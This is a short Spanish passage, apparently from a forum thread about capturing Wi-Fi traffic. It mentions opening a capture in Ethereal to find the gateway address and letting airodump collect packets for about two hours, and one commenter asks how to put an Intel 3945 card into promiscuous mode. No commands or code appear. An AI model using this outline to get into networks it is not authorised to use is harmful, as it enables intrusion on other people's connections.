Si habrimos este archivo con ethereal, otro programita disponible en el gestor de paquetes synaptic, hay tendremos la dirección de la puerta de enlace.
Todo el proceso si va bien durará unas 2 horas aprox., la mayoría lo pasa airodump captando paquetes (aunque puede tardar más).
buenas, me falta descargarme el driver de para mi tarjeta: Intel 3945 para ponerla en modo promiscuo, que no se como se hace, si alguien me lo explica… gracias